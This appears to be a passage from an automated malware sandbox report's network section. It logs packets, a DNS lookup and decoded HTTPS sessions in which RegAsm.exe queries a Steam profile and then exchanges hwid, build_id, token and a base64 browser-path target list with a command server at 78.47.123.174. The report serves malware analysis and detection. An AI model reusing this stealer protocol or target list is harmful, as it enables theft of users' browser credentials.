                                                                          May 22, 2024 18:28:24.140683889 CEST49721443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:24.140692949 CEST4434972178.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:24.140861988 CEST49721443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:24.140866041 CEST4434972178.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:24.140909910 CEST49721443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:24.140916109 CEST4434972178.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:24.778937101 CEST49722443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:24.778970957 CEST4434972278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:24.779032946 CEST49722443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:24.779613018 CEST49722443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:24.779628038 CEST4434972278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:25.001687050 CEST4434972178.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:25.001774073 CEST49721443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:25.001796961 CEST4434972178.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:25.001835108 CEST49721443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:25.001862049 CEST4434972178.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:25.001905918 CEST49721443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:25.002726078 CEST49721443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:25.002741098 CEST4434972178.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:25.467963934 CEST4434972278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:25.468108892 CEST49722443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:25.468816042 CEST49722443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:25.468830109 CEST4434972278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:25.469006062 CEST49722443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:25.469011068 CEST4434972278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:26.164635897 CEST4434972278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:26.164654970 CEST4434972278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:26.164715052 CEST4434972278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:26.164763927 CEST49722443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:26.164824009 CEST49722443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:26.165190935 CEST49722443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:26.165208101 CEST4434972278.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:26.168486118 CEST49723443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:26.168514013 CEST4434972378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:26.168595076 CEST49723443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:26.168843985 CEST49723443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:26.168857098 CEST4434972378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:26.947407961 CEST4434972378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:26.947537899 CEST49723443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:26.948105097 CEST49723443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:26.948115110 CEST4434972378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:26.948348999 CEST49723443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:26.948354959 CEST4434972378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:27.603365898 CEST4434972378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:27.603440046 CEST4434972378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:27.603490114 CEST49723443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:27.603530884 CEST49723443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:27.603745937 CEST49723443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:27.603761911 CEST4434972378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:27.626060963 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:27.626105070 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:27.626188993 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:27.626491070 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:27.626506090 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:28.326180935 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:28.326268911 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:28.326663017 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:28.326673031 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:28.326848030 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:28.326854944 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:29.005548954 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:29.005616903 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:29.005697012 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:29.005737066 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:29.006730080 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:29.006751060 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:29.682449102 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:29.682519913 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:29.682637930 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:29.682842016 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:29.682866096 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:30.364727020 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:30.364809990 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:30.365339994 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:30.365356922 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:30.365577936 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:30.365586996 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:30.365667105 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:30.365685940 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:30.365783930 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:30.365807056 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:30.365984917 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:30.366013050 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:30.366147995 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:30.366166115 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:31.586226940 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:31.586327076 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:31.586330891 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:31.586385012 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:31.586642981 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:31.586664915 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:31.590584993 CEST49726443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:31.590622902 CEST4434972678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:31.590708017 CEST49726443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:31.590909958 CEST49726443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:31.590926886 CEST4434972678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:32.297523975 CEST4434972678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:32.297766924 CEST49726443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:32.298233986 CEST49726443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:32.298247099 CEST4434972678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:32.298424959 CEST49726443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:32.298429966 CEST4434972678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:33.019579887 CEST4434972678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:33.019679070 CEST4434972678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:33.019730091 CEST49726443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:33.019764900 CEST49726443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:33.019917965 CEST49726443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:33.019934893 CEST4434972678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:33.021261930 CEST49727443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:33.021289110 CEST4434972778.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:33.021364927 CEST49727443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:33.021641016 CEST49727443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:33.021657944 CEST4434972778.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:33.765189886 CEST4434972778.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:33.765584946 CEST49727443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:33.766146898 CEST49727443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:33.766160965 CEST4434972778.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:33.766426086 CEST49727443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:33.766433001 CEST4434972778.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:34.466500998 CEST4434972778.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:34.466650009 CEST49727443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:34.466675997 CEST4434972778.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:34.466707945 CEST4434972778.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:34.466728926 CEST49727443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:34.466753006 CEST49727443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:34.467103958 CEST49727443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:34.467116117 CEST4434972778.47.123.174192.168.2.6

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          May 22, 2024 18:27:54.629149914 CEST5011253192.168.2.61.1.1.1
                                                                          May 22, 2024 18:27:54.689308882 CEST53501121.1.1.1192.168.2.6

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          May 22, 2024 18:27:54.629149914 CEST192.168.2.61.1.1.10xb5d0Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          May 22, 2024 18:27:54.689308882 CEST1.1.1.1192.168.2.60xb5d0No error (0)steamcommunity.com23.197.127.21A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • steamcommunity.com
                                                                          • 78.47.123.174

                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.64969923.197.127.214435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:27:55 UTC119OUTGET /profiles/76561199689717899 HTTP/1.1
                                                                          Host: steamcommunity.com
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:27:56 UTC1882INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                          Cache-Control: no-cache
                                                                          Date: Wed, 22 May 2024 16:27:55 GMT
                                                                          Content-Length: 35638
                                                                          Connection: close
                                                                          Set-Cookie: sessionid=6f763cd1794efcf320c6f1a3; Path=/; Secure; SameSite=None
                                                                          Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None
                                                                          2024-05-22 16:27:56 UTC14502INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                          2024-05-22 16:27:56 UTC10074INData Raw: 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62
                                                                          Data Ascii: lass="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="sub
                                                                          2024-05-22 16:27:56 UTC11062INData Raw: 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 53 45 5f 55 52 4c 5f 53 48 41 52 45 44 5f 43 44 4e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 68 61 72 65 64 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4c 41 4e 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6c 61 6e 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 4e 52 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b
                                                                          Data Ascii: quot;:true,&quot;WEBSITE_ID&quot;:&quot;Community&quot;,&quot;BASE_URL_SHARED_CDN&quot;:&quot;https:\/\/shared.cloudflare.steamstatic.com\/&quot;,&quot;CLAN_CDN_ASSET_URL&quot;:&quot;https:\/\/clan.cloudflare.steamstatic.com\/&quot;,&quot;SNR&quot;:&quot;


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.64970078.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:27:57 UTC186OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:27:57 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:27:57 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:27:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.64970178.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:27:58 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 279
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:27:58 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 34 41 43 31 31 31 41 39 36 41 32 31 37 36 32 31 38 33 38 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d
                                                                          Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="hwid"C14AC111A96A2176218386-a33c7340-61ca-11ee-8c18-806e6f6e6963------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------
                                                                          2024-05-22 16:27:59 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:27:59 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:27:59 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 3a1|1|1|0|908d1e004763457b9adffa3b0a9346c9|1|1|1|0|0|50000|00


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.64970278.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:27:59 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAA
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 331
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:27:59 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------HIJEGIIJDGHDGCBGHCAACont
                                                                          2024-05-22 16:28:00 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:00 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:00 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                          Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.64970378.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:01 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----HDGDHCGCBKFHJKEBKFBF
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 331
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:01 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------HDGDHCGCBKFHJKEBKFBFContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------HDGDHCGCBKFHJKEBKFBFContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------HDGDHCGCBKFHJKEBKFBFCont
                                                                          2024-05-22 16:28:02 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:02 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
